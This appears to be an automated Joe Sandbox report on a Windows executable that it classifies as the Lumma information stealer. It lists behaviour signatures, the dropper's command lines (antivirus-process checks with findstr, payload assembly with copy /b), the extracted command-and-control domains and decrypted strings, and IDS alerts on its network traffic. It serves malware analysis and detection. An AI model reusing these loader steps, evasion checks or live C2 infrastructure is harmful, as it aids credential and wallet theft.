Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SoftWare(1).exe

Overview

General Information

Sample name:SoftWare(1).exe
Analysis ID:1581505
MD5:8e7a36f81e75c2d3867657fe3fe09206
SHA1:64d91ff851907825620a24e77bb7c1ddf9e84c4d
SHA256:06eee6980c796d8b091a20d06bc1d77bff77601622ac0cd9721dd1b4aefc0f33
Tags:AutoITexeLummaStealersigneduser-ventoy
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for submitted file
Sigma detected: Search for Antivirus process
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
C2 URLs / IPs found in malware configuration
Drops PE files with a suspicious file extension
Found API chain indicative of sandbox detection
LummaC encrypted strings found
Sample uses string decryption to hide its real strings
Tries to resolve many domain names, but no domain seems valid
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
Potential key logger detected (key state polling based)
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • SoftWare(1).exe (PID: 7356 cmdline: "C:\Users\user\Desktop\SoftWare(1).exe" MD5: 8E7A36F81E75C2D3867657FE3FE09206)
    • cmd.exe (PID: 7444 cmdline: "C:\Windows\System32\cmd.exe" /c move Representation Representation.cmd & Representation.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7452 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tasklist.exe (PID: 7524 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 7532 cmdline: findstr /I "opssvc wrsa" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • tasklist.exe (PID: 7568 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 7576 cmdline: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 7612 cmdline: cmd /c md 250478 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • extrac32.exe (PID: 7628 cmdline: extrac32 /Y /E Katrina MD5: 9472AAB6390E4F1431BAA912FCFF9707)
      • findstr.exe (PID: 7644 cmdline: findstr /V "JIM" Accepting MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 7660 cmdline: cmd /c copy /b ..\Marco + ..\Dodge + ..\Loops + ..\Conclude + ..\Hydraulic + ..\Concern m MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Epson.com (PID: 7676 cmdline: Epson.com m MD5: 62D09F076E6E0240548C2F837536A46A)
      • choice.exe (PID: 7692 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["talkynicer.lat", "wordyfindy.lat", "enterwahsh.biz", "curverpluch.lat", "tentabatte.lat", "manyrestro.lat", "slipperyloo.lat", "bashfulacid.lat", "shapestickyr.lat"], "Build id": "HpOoIh--b701621bcd05"}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
    SourceRuleDescriptionAuthorStrings
    decrypted.memstrJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

      HIPS / PFW / Operating System Protection Evasion

      barindex
      Source: Process startedAuthor: Joe Security: Data: Command: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c move Representation Representation.cmd & Representation.cmd, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7444, ParentProcessName: cmd.exe, ProcessCommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , ProcessId: 7576, ProcessName: findstr.exe
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-12-27T22:57:35.008570+010020283713Unknown Traffic192.168.2.549752104.102.49.254443TCP
      2024-12-27T22:57:37.475591+010020283713Unknown Traffic192.168.2.549758104.21.66.86443TCP
      2024-12-27T22:57:38.838882+010020283713Unknown Traffic192.168.2.549764104.21.66.86443TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-12-27T22:57:38.254781+010020546531A Network Trojan was detected192.168.2.549758104.21.66.86443TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-12-27T22:57:38.254781+010020498361A Network Trojan was detected192.168.2.549758104.21.66.86443TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-12-27T22:57:33.072450+010020584801Domain Observed Used for C2 Detected192.168.2.5611901.1.1.153UDP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-12-27T22:57:32.456891+010020584841Domain Observed Used for C2 Detected192.168.2.5513011.1.1.153UDP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-12-27T22:57:31.612658+010020584921Domain Observed Used for C2 Detected192.168.2.5526551.1.1.153UDP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-12-27T22:57:31.923517+010020585001Domain Observed Used for C2 Detected192.168.2.5533981.1.1.153UDP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-12-27T22:57:31.291898+010020585021Domain Observed Used for C2 Detected192.168.2.5519071.1.1.153UDP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-12-27T22:57:32.234745+010020585101Domain Observed Used for C2 Detected192.168.2.5537591.1.1.153UDP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-12-27T22:57:32.765384+010020585121Domain Observed Used for C2 Detected192.168.2.5525821.1.1.153UDP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-12-27T22:57:31.067723+010020585141Domain Observed Used for C2 Detected192.168.2.5654701.1.1.153UDP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-12-27T22:57:35.771895+010028586661Domain Observed Used for C2 Detected192.168.2.549752104.102.49.254443TCP

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Source: https://manyrestro.lat:443/api4Avira URL Cloud: Label: malware
      Source: https://lev-tolstoi.com:443/apiEAvira URL Cloud: Label: malware
      Source: https://talkynicer.lat/apiAvira URL Cloud: Label: malware
      Source: https://talkynicer.lat:443/apiAvira URL Cloud: Label: malware
      Source: https://slipperyloo.lat:443/apiAvira URL Cloud: Label: malware
      Source: https://lev-tolstoi.com:443/api(DAvira URL Cloud: Label: malware
      Source: https://shapestickyr.lat:443/apiAvira URL Cloud: Label: malware
      Source: https://lev-tolstoi.com/api=Avira URL Cloud: Label: malware
      Source: https://lev-tolstoi.com/pisAvira URL Cloud: Label: malware
      Source: https://wordyfindy.lat:443/apivAvira URL Cloud: Label: malware
      Source: 0000000C.00000003.2379363712.0000000003AC4000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: LummaC {"C2 url": ["talkynicer.lat", "wordyfindy.lat", "enterwahsh.biz", "curverpluch.lat", "tentabatte.lat", "manyrestro.lat", "slipperyloo.lat", "bashfulacid.lat", "shapestickyr.lat"], "Build id": "HpOoIh--b701621bcd05"}
      Source: SoftWare(1).exeReversingLabs: Detection: 23%
      Source: 0000000C.00000003.2379363712.0000000003AC4000.00000004.00000800.00020000.00000000.sdmpString decryptor: bashfulacid.lat
      Source: 0000000C.00000003.2379363712.0000000003AC4000.00000004.00000800.00020000.00000000.sdmpString decryptor: tentabatte.lat
      Source: 0000000C.00000003.2379363712.0000000003AC4000.00000004.00000800.00020000.00000000.sdmpString decryptor: curverpluch.lat
      Source: 0000000C.00000003.2379363712.0000000003AC4000.00000004.00000800.00020000.00000000.sdmpString decryptor: talkynicer.lat
      Source: 0000000C.00000003.2379363712.0000000003AC4000.00000004.00000800.00020000.00000000.sdmpString decryptor: shapestickyr.lat
      Source: 0000000C.00000003.2379363712.0000000003AC4000.00000004.00000800.00020000.00000000.sdmpString decryptor: manyrestro.lat
      Source: 0000000C.00000003.2379363712.0000000003AC4000.00000004.00000800.00020000.00000000.sdmpString decryptor: slipperyloo.lat
      Source: 0000000C.00000003.2379363712.0000000003AC4000.00000004.00000800.00020000.00000000.sdmpString decryptor: wordyfindy.lat
      Source: 0000000C.00000003.2379363712.0000000003AC4000.00000004.00000800.00020000.00000000.sdmpString decryptor: enterwahsh.biz
      Source: 0000000C.00000003.2379363712.0000000003AC4000.00000004.00000800.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
      Source: 0000000C.00000003.2379363712.0000000003AC4000.00000004.00000800.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
      Source: 0000000C.00000003.2379363712.0000000003AC4000.00000004.00000800.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
      Source: 0000000C.00000003.2379363712.0000000003AC4000.00000004.00000800.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
      Source: 0000000C.00000003.2379363712.0000000003AC4000.00000004.00000800.00020000.00000000.sdmpString decryptor: Workgroup: -
      Source: 0000000C.00000003.2379363712.0000000003AC4000.00000004.00000800.00020000.00000000.sdmpString decryptor: HpOoIh--b701621bcd05
      Source: SoftWare(1).exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.5:49752 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.5:49758 version: TLS 1.2
      Source: SoftWare(1).exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 0_2_00406301 FindFirstFileW,FindClose,0_2_00406301
      Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 0_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406CC7
      Source: C:\Users\user\AppData\Local\Temp\250478\Epson.comCode function: 12_2_00FBDC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,12_2_00FBDC54
      Source: C:\Users\user\AppData\Local\Temp\250478\Epson.comCode function: 12_2_00FCA087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,12_2_00FCA087
      Source: C:\Users\user\AppData\Local\Temp\250478\Epson.comCode function: 12_2_00FCA1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,12_2_00FCA1E2
      Source: C:\Users\user\AppData\Local\Temp\250478\Epson.comCode function: 12_2_00FBE472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,12_2_00FBE472
      Source: C:\Users\user\AppData\Local\Temp\250478\Epson.comCode function: 12_2_00FCA570 FindFirstFileW,Sleep,FindNextFileW,FindClose,12_2_00FCA570
      Source: C:\Users\user\AppData\Local\Temp\250478\Epson.comCode function: 12_2_00FC66DC FindFirstFileW,FindNextFileW,FindClose,12_2_00FC66DC
      Source: C:\Users\user\AppData\Local\Temp\250478\Epson.comCode function: 12_2_00F8C622 FindFirstFileExW,12_2_00F8C622
      Source: C:\Users\user\AppData\Local\Temp\250478\Epson.comCode function: 12_2_00FC73D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,12_2_00FC73D4
      Source: C:\Users\user\AppData\Local\Temp\250478\Epson.comCode function: 12_2_00FC7333 FindFirstFileW,FindClose,12_2_00FC7333
      Source: C:\Users\user\AppData\Local\Temp\250478\Epson.comCode function: 12_2_00FBD921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,12_2_00FBD921
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\250478\Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\250478Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior

      Networking

      barindex
      Source: Network trafficSuricata IDS: 2058502 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (slipperyloo .lat) : 192.168.2.5:51907 -> 1.1.1.1:53
      Source: Network trafficSuricata IDS: 2058500 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (shapestickyr .lat) : 192.168.2.5:53398 -> 1.1.1.1:53
      Source: Network trafficSuricata IDS: 2058492 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (manyrestro .lat) : 192.168.2.5:52655 -> 1.1.1.1:53
      Source: Network trafficSuricata IDS: 2058512 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tentabatte .lat) : 192.168.2.5:52582 -> 1.1.1.1:53
      Source: Network trafficSuricata IDS: 2058484 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (curverpluch .lat) : 192.168.2.5:51301 -> 1.1.1.1:53
      Source: Network trafficSuricata IDS: 2058510 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (talkynicer .lat) : 192.168.2.5:53759 -> 1.1.1.1:53
      Source: Network trafficSuricata IDS: 2058480 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bashfulacid .lat) : 192.168.2.5:61190 -> 1.1.1.1:53
      Source: Network trafficSuricata IDS: 2058514 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (wordyfindy .lat) : 192.168.2.5:65470 -> 1.1.1.1:53
      Source: Network trafficSuricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.5:49752 -> 104.102.49.254:443
      Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49758 -> 104.21.66.86:443
      Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49758 -> 104.21.66.86:443
      Source: Malware configuration extractorURLs: talkynicer.lat
      Source: Malware configuration extractorURLs: wordyfindy.lat
      Source: Malware configuration extractorURLs: enterwahsh.biz
      Source: Malware configuration extractorURLs: curverpluch.lat
      Source: Malware configuration extractorURLs: tentabatte.lat
      Source: Malware configuration extractorURLs: manyrestro.lat
      Source: Malware configuration extractorURLs: slipperyloo.lat
      Source: Malware configuration extractorURLs: bashfulacid.lat
      Source: Malware configuration extractorURLs: shapestickyr.lat
      Source: unknownDNS traffic detected: query: curverpluch.lat replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: manyrestro.lat replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: enterwahsh.biz replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: talkynicer.lat replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: DCNQHRSCEtLFmnzgofyjcgCPFn.DCNQHRSCEtLFmnzgofyjcgCPFn replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: slipperyloo.lat replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: tentabatte.lat replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: shapestickyr.lat replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: bashfulacid.lat replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: wordyfindy.lat replaycode: Name error (3)
      Source: Joe Sandbox ViewIP Address: 104.21.66.86 104.21.66.86
      Source: Joe Sandbox ViewIP Address: 104.102.49.254 104.102.49.254
      Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49752 -> 104.102.49.254:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49764 -> 104.21.66.86:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49758 -> 104.21.66.86:443
      Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: lev-tolstoi.com
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: C:\Users\user\AppData\Local\Temp\250478\Epson.comCode function: 12_2_00FCD889 InternetReadFile,SetEvent,GetLastError,SetEvent,12_2_00FCD889
      Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
      Source: Epson.com, 0000000C.00000002.2468061244.0000000003870000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policydefault-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=Nonesessionid=1027947316a0eccdb173bbe6; Path=/; Secure; SameSite=NoneSet-CookienginxServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedMon, 26 Jul 1997 05:00:00 GMTExpiresContent-RangeContent-MD5Content-LocationContent-LanguageContent-Encodingtext/html; charset=UTF-8Content-Type35121Content-LengthAllowWarningViaUpgradeTransfer-EncodingTrailerPragmaKeep-AliveFri, 27 Dec 2024 21:57:35 GMTDateProxy-ConnectioncloseConnectionno-cacheCache-Control equals www.youtube.com (Youtube)
      Source: Epson.com, 0000000C.00000002.2468061244.0000000003870000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
      Source: Epson.com, 0000000C.00000002.2468061244.0000000003870000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: stly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
      Source: global trafficDNS traffic detected: DNS query: DCNQHRSCEtLFmnzgofyjcgCPFn.DCNQHRSCEtLFmnzgofyjcgCPFn
      Source: global trafficDNS traffic detected: DNS query: enterwahsh.biz
      Source: global trafficDNS traffic detected: DNS query: wordyfindy.lat
      Source: global trafficDNS traffic detected: DNS query: slipperyloo.lat
      Source: global trafficDNS traffic detected: DNS query: manyrestro.lat
      Source: global trafficDNS traffic detected: DNS query: shapestickyr.lat
      Source: global trafficDNS traffic detected: DNS query: talkynicer.lat
      Source: global trafficDNS traffic detected: DNS query: curverpluch.lat
      Source: global trafficDNS traffic detected: DNS query: tentabatte.lat
      Source: global trafficDNS traffic detected: DNS query: bashfulacid.lat
      Source: global trafficDNS traffic detected: DNS query: steamcommunity.com
      Source: global trafficDNS traffic detected: DNS query: lev-tolstoi.com
      Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: lev-tolstoi.com
      Source: Epson.com, 0000000C.00000002.2468061244.0000000003870000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:27060
      Source: Epson.com, 0000000C.00000003.2383733411.000000000404B000.00000004.00000800.00020000.00000000.sdmp, SoftWare(1).exe, Timer.9.dr, Epson.com.2.drString found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
      Source: SoftWare(1).exeString found in binary or memory: http://crl.globalsign.com/codesigningrootr45.crl0U
      Source: Epson.com, 0000000C.00000003.2383733411.000000000404B000.00000004.00000800.00020000.00000000.sdmp, Timer.9.dr, Epson.com.2.drString found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
      Source: SoftWare(1).exeString found in binary or memory: http://crl.globalsign.com/gsgccr45evcodesignca2020.crl0
      Source: Epson.com, 0000000C.00000003.2383733411.000000000404B000.00000004.00000800.00020000.00000000.sdmp, SoftWare(1).exe, Timer.9.dr, Epson.com.2.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
      Source: Epson.com, 0000000C.00000003.2383733411.000000000404B000.00000004.00000800.00020000.00000000.sdmp, Timer.9.dr, Epson.com.2.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
      Source: Epson.com, 0000000C.00000003.2383733411.000000000404B000.00000004.00000800.00020000.00000000.sdmp, SoftWare(1).exe, Timer.9.dr, Epson.com.2.drString found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
      Source: SoftWare(1).exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
      Source: Epson.com, 0000000C.00000003.2383733411.000000000404B000.00000004.00000800.00020000.00000000.sdmp, SoftWare(1).exe, Timer.9.dr, Epson.com.2.drString found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
      Source: SoftWare(1).exeString found in binary or memory: http://ocsp.globalsign.com/codesigningrootr450F
      Source: SoftWare(1).exeString found in binary or memory: http://ocsp.globalsign.com/gsgccr45evcodesignca20200U
      Source: SoftWare(1).exeString found in binary or memory: http://ocsp.globalsign.com/rootr30;
      Source: Epson.com, 0000000C.00000003.2383733411.000000000404B000.00000004.00000800.00020000.00000000.sdmp, Timer.9.dr, Epson.com.2.drString found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
